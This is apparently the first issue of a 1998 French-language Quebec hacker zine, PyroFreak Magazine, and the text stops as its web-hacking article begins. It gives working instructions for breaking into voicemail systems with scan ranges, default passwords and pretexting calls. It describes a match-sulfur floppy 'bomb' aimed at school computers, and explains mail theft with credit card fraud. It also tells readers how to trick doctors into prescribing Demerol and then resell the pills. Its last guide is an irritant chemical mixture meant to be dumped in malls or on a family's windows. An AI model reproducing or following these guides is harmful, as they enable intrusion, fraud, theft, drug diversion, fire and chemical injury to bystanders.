-::-No slogan set _____ _____ _ ______ ______ __ ___ _________ |: __ _ \ \ \ / / | ____ | / ___ | | \__ _\ \ \ \/ ; / |; /_ _/ | / / /; | | ____ __ ___\ \ : / |: _ / | / / : | |: | / , / |, | \ : \ | :\__/ | |; | ___/ . / |. | \ ; \ | ; / |___\ \________/ |___\ \__ ____\ |_________/ ____ _ ___ __ ___ ___ ______ __ _______ |: _ _ ;\ | \ \ \ / ;| | | / . / | | \_______\ |: _\ \_ _\ / /| :| | ;| / / _| |___ _____ |; |__ ____ / <_| ,| | |/ : / |_|, ___| |; .\ | __\ \_:__\ / _ | | ;/ |: | |: ` / | :|____ ____ \ / |; | | |\ \ |; | |, |\ \ | ; \ \ ;\ \/ |: | |: | \ .\ |___\ |__| \_| |________\ \____\ |____| |___\ \_____\ -::>Month Topic: Réveillez-vous!!!!!! Crédit: __2 1 Février 98 Mesdames et Messieurs, je vous presente le new zine pyrofreakmag. Ca c'est un entre remarquable, mais j'ai hate de voir si je vais m'habituer avec ce nom de zine la. Bon assez plaisanté maintenant. Passons aux choses un peu plus serieuses. INFORMATIONS Premierement, Quel est le but de cette zine?: Celle-ci a comme but de faire develloper l'under- ground (surtout au Québec mais aussi dans tout autres endroit ou ca parle francais), et cela dans plusieurs domaines, soit: Le hacking, le phreaking, et toutes autres choses juger pertinantes pour nos lecteurs. Deuxiement, a qui cet zine s'adresse t'elle?: Pyrofreakmag s'adresse à tous les gens qui veulent apprendre, cé clair et simple. Troisiement, a quelle fréquence va etre distribuer Pyrofrakmag?: Pyrofreakmag va etre distribuer a une frequence d'environ 1 fois par mois, mais cela sans avoir vraiment une date precise. Quatriement, Comment nous rejoindre?: Voici les moyens de rejoindre Pyrofreakmag et ses membres. Soit sur IRC, sur #phreak.fr ,via le serveur undernet. Soit par e-mail: pyrofreakmag@hotmail.com | Pour tous les membres neuro@warlordz.com | Pour rejoindre Neuro lordendrix@hotmail.com | Pour rejoindre Endrix psycopat@psycopat.com | Pour rejoindre psycopat NuClEaR@nuc99.com | Pour rejoindre Nuclear fuckyou@ass.hole | Pour le service des plaintes Et vener visiter notre site web: http://pyrophreak.cjb.net Si vous voulez que votre article paraisse dans le #2, envoyer le a pyrofreakmag@hotmail.com . Ou si vous avez des questions, envoyer les aussi a pyrofreakmag@hotmail.com . SVP, pas de question style: Comment hacker ou Comment phreaker? Cinquiement: Les gens qui pensaient que ce zine allait juste s'Adresser au phreaker, vous avez eux tord. Meme si on reprend frphreak, on a décider de parler de underground en général, et non seulement du phreak. Sixiement: Pour une question d'estetique, j'ai decide de mettre aucun accents dans cet zine (Un peu). Et pour une fois je vais essayer de me forcer pour ne pas faire de faute d'ortographe ou de frappe, mais bon je suis pas prof de francais. FIN DE L'INTRO Devise du zine: Quand qu'on produit un zine, et qu'on est rendu au 17 ieme numero, et que la qualitee du zine se deteriore, a cause du manque de d'idee, aussi bien arreter ca la, au lieu de se rabaisser. (Je vise personne en par- ticulier dans ce court paragraphe-ci.) J'en connais un qui va arreter de lire le zine ici. :)))) La joke du zine: mange dla marde ptite couile :))))))))))))))))))))))))))) Ta tu fini avec tes aneries Nouvelle du zine: Yahoo a acheter geocities pour 3.9 milliards de dollars. Les actions on grimpees de 47$ a 102$. Vous devez lire ceci avant d'aller plus loin Pyrofreakmag (et ses membres) tient a avertir les gens qui vont continuer a lire le texte qui va suivre: Ont n'est aucunement responsable des actes, et meme des pensés qui pourraient etre produites par les lecteurs de ce zine par rapport a nos articles . Nous tenons a mettre cela bien au clair. Si vous n'etes pas d'Accord avec cet affirmation, fermer ce texte, et effacer le de votre disque dur ou sur tout autres disques. Vous etes le seul responsable de vos actes. ____________________________________________________________________________ TABLE DES MATIERES TITRE DE L'ARTICLE NICK DE L'AUTEUR INTRO 1:Quelques conseils sur les VMBs Neuro 2:DiskBomb endrix 3:Numéros intéressant de téléphone Américain Neuro 4:Fini le trashing, allons y pour la poste! Neuro 5:Le Démérol Neuro 6:Pourquoi les gens pleurent? Neuro 7:WebPage Hacking endrix 8:Qui sont-ils ? [G]r4FX CONCLUSION ____________________________________________________________________________ Quelques conseils sur les VMBs. Par Neuro Pour lire l'Article qui va suivre, vaut mieux avoir une base sur les VMBs, pour celle-ci je vous conseille d'Aller lire NPC #4, en passant je trouve ce zine exellent. Dans l'Article qui va suivre, je vais vous montrer, et expliquer quelques techniques pour trouver et hacker une VMB plus facilement. Petite définition de la VMB: C'est une boite vocale, qui est située sur un réseau (Compagnie, commerce, autres). Comment trouver une VMB local? Rien de plus simple, je vous explique quelques techniques. 1- Regarder dans le botin téléphonique. Comment trouver une VMB dans le botin téléphonique? C'est simple, regarder dans les pages jaune dans la section des entreprises, 90% du temps, celle-ci possede un systeme de VMB. Ou regarder dans la section dentistes ou medecins. Si la clinique possede juste un specialiste, c'est surement une boite vocale normal, mais si vous voyer une annonce dans cette section, qui donne les noms des spécialistes de cet etablissement, c'est qui a surement un reseau de VMB. Ya aussi un deuxieme moyen qui est un peu plus complexe, mais on obtient de meilleurs résultats. Je vous explique le principe. Le numero de tele- phone de la banque de votre ville est 454-9823. Il ne vous reste plus qu'a essayer 5 chiffres plus bas et 5 chiffres plus haut, soit dans l'exemple-ci qui serait de 454-9818 à 454-9828. Vous avez de bonne chance de trouver un réseau de VMB qui est associer a la banque. Ceux-ci sont intéressant, car 80% du temps elle contienne un systeme de PBX. Pour ceux qui connaise pas ce que veux dire PBX, bien c'est un numero qui fais transition entre votre numero, et le numero a appeler. Ce qui veux dire que si vous faite des long distance, c'est le PBX qui paye. Et si vous appeler quelqu'un, c'est le numero du PBX qui affiche sur afficheur (bell) ou qui est retracer. C'est pourquoi, si vous hacker une VMB d'une banque, vous risquer de faire deux pieres d'un coup. En passant quand vous scanner , je vous conseille le *67, pour éviter les callback. Ya deux avantages, et un désavantage sur les VMBs local. Avantage #1: 70% du temps, une PBX les accompagnes Avantage #2: Vous pouvez mettre en application le Social Engenering parce que, 80% du temps. La personne a qui appartient la boite vocale dit son nom au complet dans le message d'entrer. Ce qui vous reste a faire, cé d'Aller dans le botin téléphonique chercher son nom, et essayer les pass possible avec son numero de tel ou avec son adresse. Si ca fonctionne pas, il ne vous reste qu'a appeler la personne en question, et vous faire passer pour un sondeur, et lui demander des questions, style ca date de naissance de lui, ca femme et ces enfants et tout autres renseignement que vous juger bon de demander qui ont rapport au password. Désavantage #1: Pour rejoindre la boite vocale, ou pour que des gens la rejoindre, il faut etre dans la meme zone (bell) que celle- ci, sinon il y aura des frais de long distance. Comment trouver une VMB international (1-800)? Le moyen le plus simple est en scannant. Pour scanner je vous conseil- le programme toneloc, en passant vener pas me demander comment il fonctionne, liser le help (J'Ai l'impression d'avoir déja vu cette phrase ailleur :)). Je vais vous donner quelques séries de numeros a scanner, qui ont un bon pourcentage de VMB. 1-800-247-XXXX 1-800-248-XXXX 1-800-251-XXXX 1-800-252-XXXX 1-800-253-XXXX 1-800-255-XXXX 1-800-257-XXXX 1-800-258-XXXX 1-800-523-XXXX 1-800-524-XXXX 1-800-525-XXXX 1-800-526-XXXX 1-800-527-XXXX 1-800-528-XXXX Ici, le *67 est plus ou moins important, vu que dans plusieurs cas, c'est des compagnies, et prennent pas le temps de vérifier le numero, et ca bien sur si y'on la possibiliter. Quand hacker,scanner les VMBs? Cé simple, apres 21h et avant 7h am, vous risquez moins de rejoindre une téléphoniste. Pour les password!! 80% du temps, les password sont composer de 4 chiffres, c'est pourquoi voici une liste de password par defaut: 0000 1111 2222 3333 4444 5555 6666 7777 8888 9999 1234 Si la boite vocale=318 le pass peut etre: 3180 0318 8130 Un autre type de password par défaut est d'essayer de 1945 a 1980, parce que ya beaucoup de monde qui mette leur année de naissance. Ou et quand composer le password? Cela dépend du system auquel vous avez affaire. Dans tout les cas, vous dever attendre que la VMB déclenche avant de faire quelque chose. Quand le message d'intro démarre, appuyer sur ## ou ** ou *0 ou 81 ou #, ou autre chose semblable a ca (*7,*1,*4). La il y a une demoiselle qui va vous demander d'insérer le numero de la boite vocale ainsi que le password et d'appuyer sur #. Ce qui veux dire que si la boite vocal est 318, et le pass est 1234, vous tappez 3181234#. Si vous avec le bon password, vous avez un acces total a la VMB. Vous pouvez changer le message d'intro, envoyer des messages, effacers des messages et etc... Si vous etes pas capable de trouver le pass, essayer un autre VMB, parce que y'En a tellement , et beaucoup d'entre-elle on les password par defaut. Conclusion D'apres mon expérience, si vous avez un bon "cerveau", en moins de une heure vous parviendriez a hacker une VMB. En passant, si vous hacker une sysAdmin, (La box qui controle tout le réseau), vous pouvez creer a votre guise des VMB ou en effacer (je vois pas l'utiliter), c'est la chose la plus interes- sante dans un systeme de VMBs, le seul probleme, elle est plus dure a hacker, parce qu'elle est souvent composer de 5 ou meme 6 chiffres pour le password. Il y a beaucoup d'autres choses sur les VMBs, ca va surement aller dans le #2. Voici quelques VMBs que je vous donne, il ne vous reste plus qu'a les hacker. 1-800-468-4556 (Juste jour) *2 pour quitter le system *3 et * 4 Pour choisir la Box 1-800-468-9012 1-800-468-3124 1-800-468-0755 1-800-821-1092 *4 le pass # 24/24 3 essais 1-800-821-4763 *4 le pass # 24/24 3 essais 1-800-526-0080 1-800-654-0089 ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #1 : Question a faire réfléchir: | Combien il y a de ip entre 1.1.1.1 et 255.255.255.255? | Si vous le savez, envoyer nous un e-mail :)! '.________ __ __ ___________ ____ ______________ ____ ___ ______ __ __ ===============================par endrix=============================== ======================================================================== ======================================================================== == ____ _ _ ____ _ == == | _ \(_)___| | _| __ ) ___ _ __ ___ | |__ == == | | | | / __| |/ / _ \ / _ \| '_ ` _ \| '_ \ == == | |_| | \__ \ <| |_) | (_) | | | | | | |_) | == == |____/|_|___/_|\_\____/ \___/|_| |_| |_|_.__/ == == == ======================================================================== =Tu habites en outaouais et tu as les éditions précédentes de 2600 ??? = = hey bien entre en contacte avec moi svp ... Je les cherches ... :) = ======================================================================== ======================================================================== O===============O <| c 0 n + 4 c t |> O===============O __________________________________________________________________ / _____________________________________<-www.endrix.net->__________\ ||Site Web : Http://endrix.cjb.net ||____¯_¯_¯_¯_¯_¯_¯_¯____________\ ||Contact : lordendrix@hotmail.com ||______________________________|+| ||mIRC : #pirate, #grc, #hack.fr, #phreak.fr, #outaouais, #n0past |+| \ ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ / ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ O==========================O <| 1 n + r 0 d u c + 1 0 n |> O==========================O Faire une bombe avec une disquette qui marche pu !! WAW quel exploit !!! Pour le monde qui me croit pas que ca marche, 1N Y0UR F4C3 !!! Je l'ai essayé sur mon vieux testeur de trojans, virus.. mon vieu boy(486 - 44) Ca marche très bien, ya meme fallut que je charge mon floppy colisse... Alors suivez tout a la lettre dans ce zine et vous allez pourvoir en faire sur les ordinateurs de votre école ... :))) mouhhahhahaah !!!! Err418 ---> Je veux pas que CHG me rip ca la ... (heehe, in ya face !!!) O==================O <| D 1 5 k B 0 m b |> O==================O ------------------------------ -Les outils qu'il vous faut :-] ------------------------------ - Une vieille disquette (dans tes vieilles affaires) - du vernie a ongle TRANSPARENT (demande a maman) - Beaucoup d'allumettes (dans les affaires a papa) - Un ordi a ton école (pour le ...testing...) - Un petit bocal (va voir moman) ------------------------------ - H3r3 s+4rs+ 7h3 4c+10n ...:-] ------------------------------ 1- Premièrement, il faut ouvrir la disquette DOUCEMENT !!!! Il faut faire attention que le plastique ne casse pas, sinon ca va être plus dur la refermer ... 2- Quant tu ouvres la disquette, tu vas voir 2 morceau de coton blanc pour empêcher que le disque en tournant touche le plastique. Enleve-les ... 3- Prend n'importe quel outil pour faire ce qui suit sauf du papier sabler(duh!) 4- Il faut prendre le souffre qu'il y a sur les allumettes et le mettre dans le petit bocal. 5- Avec le vernie a ongle, il faut mettre une petite-moyenne(huH?) couche sur le disque. 6- Mettre du souffre sur le vernie a ongle(qui est sur le disque) et essayer de le faire des 2 bords. C'est juste plus efficase mais c'est pas nécessaire. 7- Remettre le plastique sur le disque et refermer la disquette. Le vernie va agir d'agent collant pour coller les deux plastique de la disquette. 8- Attendre que le vernie soie complètement sèche ... Et après se trouvé un ordi sible, mettre la disquette dedans, l'allumer et PARTIRRRRRR !!!!! 9- Quand l'ordi va booter, il va pensé que c'est un boot disk(heehe) et il va lire dessus. QUand le disque va tourner, le souffre va brulé et ansi va la vie ... O=====================O <| c 0 n c l u s 1 0 n |> O=====================O hey bien ... J'espère pour vous que l'ordinateur ne brulera pas !!! =P C'est tout ce que j'ai a dire bordel... ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #1 : Si vous avez besoin d'une meche pour un explosif | penser a une Cigarette!!!! | Pour une plus longue durer il y a le Cigar!!! '.________ __ __ ___________ ____ ______________ ____ ___ ______ __ __ Numéros intéressant de téléphone Américain. Par Neuro Voici quelques numeros de telephone que j'ai découvert dans un zine anglophone, vous pouvez peut-etre trouver une Utilitée a ceux-ci. 215-561-3199/SPRINT LONG DISTANCE 202-456-1414/WHITE HOUSE 011-441-930-4832/QUEEN ELIZABETH 916-445-2864/JERRY BROWN 800-424-9090/RONALD REAGAN'S PRESS 212-799-5017/ABC NEW YORK FEED LINE 800-882-1061/AT & T STOCK PRICES 212-986-1660/STOCK QUOTES 213-935-1111/WIERD EFFECTS! 512-472-4263/WIERD RECORDING 212-976-2727/P.D.A. 619-748-0002/FONE CO. TESTING LINES 900-410-6272/SPACE SHUTTLE COMM. 201-221-6397/AMERICAN TELEPHONE 215-466-6680/BELL OF PENNSYLVANIA 202-347-0999/CHESAPEAKE TELEPHONE 213-829-0111/GENERAL TELEPHONE 808-533-4426/HAWAIIAN TELEPHONE 312-368-8000/ILLINOIS BELL TELEPHONE 317-265-8611/INDIANA BELL 313-223-7233/MICHIGAN BELL 313-223-7223/NEVADA BELL 207-955-1111/NEW ENGLAND TELEPHONE 201-483-3800/NEW JERSEY BELL 212-395-2200/NEW YORK TELEPHONE 515-243-0890/NORTHWESTERN BELL 216-822-6980/OHIO BELL 206-345-2900/PACIFIC NORTHWEST BELL 213-621-4141/PACIFIC TELEPHONE 205-321-2222/SOUTH CENTRAL BELL 404-391-2490/SOUTHERN BELL 203-771-4920/SOUTHERN NEW ENGLAND 314-247-5511/SOUTHWESTERN BELL 414-678-3511/WISCONSIN TELEPHONE 800-327-6713/UNKNOWN ORIGIN 303-232-8555/HP3000 315-423-1313/DEC-10 313-577-0260/WAYNE STATE 512-474-5011/AUSTIN COMPUTERS 516-567-8013/LYRICS TIMESHARING 212-369-5114/RSTS/E 415-327-5220/NEC 713-795-1200/SHELL COMPUTERS 518-471-8111/CNA OF NY 800-327-6761/AUTONET 800-228-1111/VISA CREDIT CHECK 713-483-2700/NASUA 213-383-1115/COSMOS 408-280-1901/TRW 404-885-3460/SEARS CREDIT CHECK 414-289-9988/AARDVARK SOFTWARE 919-852-1482/ANDROMEDA INCORPORATED 213-985-2922/ARTSCI 714-627-9887/ASTAR INTERNATIONAL 415-964-8021/AUTOMATED SIMULATIONS 503-345-3043/AVANT GARDE CREATIONS 415-456-6424/BRODERBUND SOFTWARE 415-658-8141/BUDGE COMPANY 714-755-5392/CAVALIER COMPUTER 801-753-6990/COMPUTER DATA SYSTEMS 213-701-5161/DATASOFT INC. 213-366-7160/DATAMOST 716-442-8960/DYNACOMP 213-346-6783/EDU-WARE 800-631-0856/HAYDEN 919-983-1990/MED SYSTEMS SOFTWARE 312-433-7550/MICRO LAB 206-454-1315/MICROSOFT 301-659-7212/MUSE SOFTWARE 209-683-6858/ON-LINE SYSTEMS 203-661-8799/PROGRAM DESIGN (PDI) 213-344-6599/QUALITY SOFTWARE 303-925-9293/SENTIENT SOFTWARE 702-647-2673/SIERRA SOFTWARE 916-920-1939/SIRIUS SOFTWARE 215-393-2640/SIR-TECH 415-962-8911/SOFTWARE PUBLISHERS 415-964-1353/STRATEGIC SIMULATIONS 217-359-8482/SUBLOGIC COM. 206-226-3216/SYNERGISTIC SOFTWARE 1-800 Numero du Gouvernement USA: 800-321-1082:NAVY FINANCE CENTER. 800-424-5201:EXPORT IMPORT BANK. 800-523-0677:ALCOHOL TOBACCO AND. 800-532-1556:FED INFORMATION CNTR1-1082:NAVY FINANCE CENTER. 800-424-5201:EXPORT IMPORT BANK. 800-523-0677:ALCOHOL TOBACCO AND. 800-532-1556:FED INFORMATION CNTR. 800-325-4072:COMBAT & ARMS SERVICE. 800-325-4095:COMBAT SUPPORT BRANCH. 800-325-4890:ROPD USAR COMBAT ARMS. 800-432-3960:SOCIAL SECURITY. 800-426-5996:PUGET NAVAL SHIPYARD. Autres: 301-234-0100:BALTIMORE ELECTRIC. 202-456-1414:WHITE HOUSE. 202-545-6706:PENTAGON. 202-343-1100:EPA. 714-891-1267:DIAL-A-GEEK. 714-897-5511:TIMELY. 213-571-6523:SATANIC MESSAGES. 213-664-7664:DIAL-A-SONG. 405-843-7396:SYNTHACER MUSIC. 213-765-1000:LIST OF MANY NUMBERS. 512-472-4263:WIERD. 512-472-9941:INSERT 25. 203-771-3930:PIONEERS. 213-254-4914:DIAL-A-ATHIEST. 212-586-0897:DIRTY. 213-840-3971:HOROWIERD 203-771-3930:PIONEERS 213-937-3580:TELENET ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #1 : | Saviez vous que si vous etes arreter pour | fraude informatique (600$), c'est une sentence 3 fois | supérieur a un vol de véhicule (automobile,etc.)? '.________ __ __ ___________ ____ ______________ ____ ___ ______ __ __ Fini le trashing, allons y pour la poste!!! Vous avez besoin de numero de carte de crédit? Vous avez besoin d'information sur quelqu'un? Vous avez besoin d'argent? Vous me croiriez pas si je vous disais que j'Ai la solution pour vous.Et cela grace a la poste (mail). Pourquoi aller faire du trashing (fouiller dans les vidanges) pour trouver des infos, quand on a juste a suivre le facteur durant une journer. Je vous explique mon aventure!! C'étais en un beau vendredi apres-midi. Je recois l'Appel de quelqu'un, me disant ceci. Drig Drig Drig Hello Slu Hey mec, ca te tante tu de fêter a soir? Pourquoi pas! il y a un méga party chez nous, d'la bieres des filles, pis la musik Juste 10$ l'entrer, pis t'amene ton stuck si tu veux fumer. Ouais, cé intéressant, mais... Il y a un probleme, j'Ai pas une cent Ah, j'te connais ben, tu va t'arranger, fais aller ton esprit de fraudeur comme d'habitude En tk je t'attend k bye bye Apres avoir eu ce téléphone, fallais que je trouve du cash. Je me suis mis a penser. Durant que je pensais, J'entendis le facteur déposer les lettres dans ma boite a malle. Je vais chercher mes lettres. Une lueur de bonheur se fit paraitre dans mes yeux, une lettre de ma tante quelques jours avant Noel. C'est quoi??? Une carte disant Joyeux Noel? De l'argent pour me féliciter d'etre aussi gentil? J'ouvre la lettre, hé oui, j'avais bien raison, une lettre accompagner d'un beau billet de 50$. Mon problème étais résolu. Tout d'un coup, une penser diabolique me vient en tete. Je me suis dit: Si je recois du cash pour noel par la poste, je suis surement pas le seul a qui sa arrive???. Et oui vous avez deviner, j'Ai suivi le facteur durant une journer. Je vous explique comment procéder. Chez nous, le facteur passe a 13h. A cette heure la, 80% des gens sont au travail. Mais vous, vous avez prit conger, parce que vous avez besoin de cash. Le facteur distribu les lettres a toutes les maisons de votre rue.Il ne vous reste plus qu'a le suivre de quelques maisons, et de rammaser tout ce qui est intéressant dans la boite a malle de la victime. Soit: Relever de carte de crédit. Envellope normal Petit colis. Votre Revue préférer de la semaine. Et tout autres affaire que vous juger intéressant. Dans un relever de carte de crédit, vous avez le numero de la carte, nom de la personne a qui appartient la carte,le solde,les fonts disponible sur celle-ci. Il ne vous reste plus qu'a trouver la date d'expiration. Pas bien dure. Vous aller sur un site de cul. Et vous vous abonner en essayant les date d'Expiration une a une. Vous avez juste 48 possibilités, vu qu'habitu- ellement, la date d'expiration est 4 ans apres l'entrer en vigueur de la carte. Essayer de trouver tout autres informations intéressantes, mais essayer de vous faire discret, en laissant quelques envelloppes dans la boite a malle, pour pas que le propriétaire de celle-ci s'en apercoive trop rapidement. Quel est le meilleur temps pour faire ce truc? C'Est simple, c'est la semaine avant noel. Juste en faisant une vingtaine de maison, vous risquer de vous faire un minimum de 120$ facilement. Ce qui devient tres payant a l'heure, vu que vous pouvez faire cela en 30 min. Voici d'Autre temps durant l'année ou c'est assez payant. -Durant la semaine avant Paque -La semaine suivant la fin des cours (Primaire et secondaire). -Si vous connaiser la date de fete de quelqu'un dans votre quartier -St-Valentin Si vous etes chanceux vous risquer meme de ramasser une vrai carte de crédit. Dans ce cas la, vous avez qu'a aller magasiner, et la vider. Surtout qu'il n'y a pas encore de signature au l'endo (Metter la votre), et que son propriétaire ne sait pas qu'elle est en ce moment actif. Vous avez environ 3 jours pour la vider!! Pour ceux qui sont plus bati, et qui aime travailler en équipe de 2 ou 3. Je vous conseille de vous attaquer au boite rouge de Poste Canada, (Celle pour l'extérieur de votre région, parce que le monde envois de l'argent en cadeau quand c'est trop loin de chez-eux). Je vous explique le principe. Vous préparer votre coup pour un dimanche soir, parce que ca fais plus qu'une journer que la poste n'est pas venu rammaser le courriers. Vous vous metez deux personnes, pour essayer de virer cette boite a mail a l'envers (Qui a un poid qui est assez considérable, d'apres mon expérience, qui est pres de 175 a 200 lbs). Et la troisieme personne fais basculer la porte pour que les lettres sortent de la mail. Si vous faite cela le dimanche avant Noel, vous avez beaucoup de chance de vous faire minimum 70$ chaque (3). Mais si vous en faite 5 comme ca, vous venez de multiplier le montant par 5, ca commence a devenir intéressant. Conclusion: J'ai déja essayer de défoncer une boite verte (Ca équivaut a toutes les boites rouge d'un quartier (environ 10), c'est tres tres tres résistant, et meme avec de l'acide a 90% ca ne peut marcher, car il a un espace entre la porte et la serrure. Dans le #2 je vais essayer d'etre plus précis en mettant des photos dans mes textes. Dans la premiere parti de ce texte je parlais bien sur, des boite a malle qui sont au maison (sans serrure), et non celle qui sont en un bloc pour un quartier complet,quoi que j'ai une bonne technique pour celle-ci,mais ca va aller dans le #2. ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #1 : | Saviez-vous que toutes zines sur underground | qui ont été distribuer au public en francais depuis 1993, | Correspond a l'équivalent d'un dictionaire en longueur de texte? | Soit 2000 pages!!! '.________ __ __ ___________ ____ ______________ ____ ___ ______ __ __ Le démérol Par Neuro Déja en lisant le titre de cet article, vous avez plusieurs questions en tete: Qu'est-ce que le démérol? A quoi ca sert le démérol? Comment en tirer profit? J'ai réponse a vos questions dans les prochaines lignes. Qu'est ce que le Démérol et a quoi sert-il? Le démérol est un médicament tres puissant. Il sert a enlever la douleur. On appele cette catégorie de Médicament, des anti-douleur (évidamment). Dans cette meme classe on retrouve la morphine et l'héroine (Celle-ci n'est plus vraiment utiliser de nos jours contre la douleur, a cause de sa dépendance quel entraine). Le démérol est utiliser comme anti-douleur juste avant la morphine, ce qui veut dire que celui-ci est tres puissant, mais bien entendu moins que la morphine. Avantage du démérol a la morphine: -Cout moins éléver -Peut etre sous forme de pilule a avaler -Les médecins les prescrive plus facilement que la morphine, qui celle-ci est quasi improcurable si vous n'etes pas hospitaliser. -Dépendance moins élever Comment en tirer profit? Je vous explique le principe. Vous voulez tripper sans avoir de grosse dépense. Et vous voulez tripper assez fort. La solution, le démérol. Vous aller chez un médecin "débutant" (Qui en passant sont plus facile a berner). Vous lui dite que vous avez de tres puissante crampe, et que vous avez de la misere a marcher quand elles se produisent. La, dite lui que vous avez déja eu ce probleme auparavant, et le medecin qui vous avais suivi vous avait prescris du démérol. La, il va vous examiner un peu, et dans sa tete, il va penser vous prescrire du démérol pour suivre son confrere. Le medecin va vous demander combien de fois par jour, vous avez ce genre de douleur. Dite y de 3 a 4 fois par jour. Si vous lui dite ca, vous avez de forte chance d'avoir une prescription d'Environ 60 pilules de 50 mg de démérol.Le cout est d'environ 25$, mais si vous etes assurer, le cout réduit considérablement, et peut etre meme gratuit.Serait-ce une facon de frauder le gouvernement?? La, le fun commence. La premiere fois que vous allez prendre ca, vous aller en avoir assez de 3 pilules de 50mg. Vous allez voir le buzz que ca fais, et vous en redemanderez, cé assurer. Le buzz dure environ 2h et cela de facon intense. Vous allez etre parti dans les nuages, cé le cas de le dire. Maintenant pour se faire du cash, il ne vous reste plus qu'a en vendre. Style, 3$ pour une pilule.Ce qui donne un bon profit si vous calculer: 3X60-25=155$ 155 beau dollars de profit, et vous allez avoir des adeptes. Je veux vous avertir que le démérol entraine une dépendance. Apres 4 ou 5 expérience, il va vous falloir une plus grosse dose, soit 4 ou plus pilules. Et apres quelques temps, cela peu monter beaucoup plus haut. Moi personnellement, j'ai essayer 5 1/2 pilules, apres environ 2 sem d'utilisation, et j'avais la meme effet quand j'en ai prit 3 pour la premieres fois, parce que on s'habitu tres vite a cette subtance. Attention: Prener pas plus que 3 pilules de 50 mg, dès votre premier trip, parce que vous risqueriez de le regretter. Attention: Le démérol engage une dépendance tres importante. Attention: Il cause de la sommenolance, facque conduisez pas. Bon c'étais l'idée principal que je voulais passer a travers ce texte. Pour conclure, je voudrais dire que le démérol existe sous forme d'injection, soit 10$ pour 50 mg. Mais il vou faut une prescription, et elle est beaucoup plus difficile a obtenir. Et je trip pas fort sur les aiguilles, tk. Bien entendu, c'est beaucoup plus puissant, et ca la un effet tres rapide. Dans plusieurs cas c'est le medecin lui meme qui l'injecte. //en absence de démérol je n'avais pas d'alcool// Crédit: Jean Leloup ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #1 MODEM=MOdulateur-->DEModulateur :)))) '.________ __ __ ___________ ____ ______________ ____ ___ ______ __ __ Pourquoi les gens pleurent? Par Neuro En un beau dimanche apres-midi, vous allez magasiner dans votre centre- d'achat favoris. Tout-à-coup vous avez les larmes aux yeux, et vous n'etes plus capable d'arreter de pleurer, et cela, pareil pour les gens qui vous suivrent. Pourquoi? Deux possibiliter: Soit que tout le monde a une bonne raison de pleurer, ou soit qu'un petit anarchiste a jouer un tour. Dans l'article qui va suivre, je vais m'aborder sur la deuxieme possibiliter. Matériaux nécessaire 500 ml d'acetone pur On trouve l'acetone … la Quincaillerie du coin, dans la section dilluant a peinture. 450 ml de Peroxyde 30% On trouve le peroxyde 30% dans quelques pharmacies ,dans la section teinture pour cheveux, ou dans un centre de coiffure. Bien important faut pas que le peroxyde soit en crŠme comme a quelques endroits qui en vendent, mais bien un liquide transparant comme de eau. 40 ml d'acide muriatique 20% (HCL) On retrouve l'acide muriatique à la quincaillerie du coin, dans la section piscine, ou dans un centre de la piscine. ATTEMTION: Ce produit est tres dangereux, ne le respirer pas et essayer de pas entrer en contact avec celui-ci. 1 Sac de magasinage 1 bouteille 2L de liquer vide Vous etes a l'entrer du centre d'achat, cacher dans les buissons, ou dans votre char (Je trouve la deuxieme possibiliter mieux que la premiere). Vous mélanger c'est 3 produit ensemble dans une bouteille 2 litres de liqueur, et vous brasser moyennement le tout et cela sans mettre le bouchon. Vous metter la bouteille dans un sac en plastique de magasinage, de facon quel soit debout, vu qu'il n'y a pas de bouchon. Vous rentrer dans le centre d'achat, et vous vider votre bouteille dans une poubelle. En moins de 5 à 10 minutes, tout le monde qui vont passer a 20 pieds de la poubelle vont se mettre a pleurer comme des petits fous, et vous, durant ce temps vous aller vous bidonner dans un coin. Quand une personne passe pres de la poubelle, les yeux vont lui commencer a bruler, ensuite une larme va tomber, et ensui- te plusieurs larmes. Pour la victime, cela dure environ 15 min. Mais si quelqu'un s'assoit sur le banc a coter de la poubelle en question, putain de merde yé fou si il reste assis la plus que 2 minutes. Pourquoi pas mettre le bouchon? Deux raison, Ca va mieux pour la vider dans la poubelle, et vous ne risquer pas que la bouteille vous explose dans les main. Cela est un truc que moi-meme j'Ai découvert en faisant du peroxyde d'acétone dans ma maison. Faite attention , si il y a des petits bébés pres de la poubelle, cela va etre un peu moins drole pour vous, mais dite vous que le centre-d'achat est un exemple comme un autre. Vous pouvez mettre le produit au dessus d'une Urinoire (toilette acoter au mur). La personne aura meme pas le temps de finir de pisser, quel va etre en train de pleurer en ce demandant ce qui se passe. Si vous avez un ennemi, vous aller chez-lui(dehors), et vous verser le produit sur le rebord d'une fenetre ouverte. Essayer d'en choisir une ou le vent est en votre faveur. Bien entendu cela doit etre fait durant l'été ou autre moment que les fenetres sont ouvertes. Pour une plus grande efficaciter, verser le produit sur le rebord de toutes les fenetres ouvertes. La famille va sortir de la maison en courrant. ATTENTION: Ce produit,si exposer longtemps aux yeux, peu provoquer des irratations de facon importante, soyez toujours prudent. Pour conclure: La yé 5h30 du matin, j'ai un cours "d'éducation physique" dans 1h30, pis chu ben saoul et cela sans avoir dormi de la nuit. Bizzare c'est quand je suis saoul que j'ai des idées pour mes articles. La yé rendu 10h am de la meme journer, pis je me suis fais crisser dehors de mon cours pour l'anner, spa grave c'étais poche. Le texte que vous venez de lire, est une version corriger de l'original, si je l'aurais pas fait, vous auriez rien compris. Amuser vous bien. ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #1 : | Un numero a essayer au Quebec sans vraiment une utilitée | 320-0048 | '.________ __ __ ___________ ____ ______________ ____ ___ ______ __ __ - -ÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ-- - ú ³ +:par endrix:+ ³ ³ú - 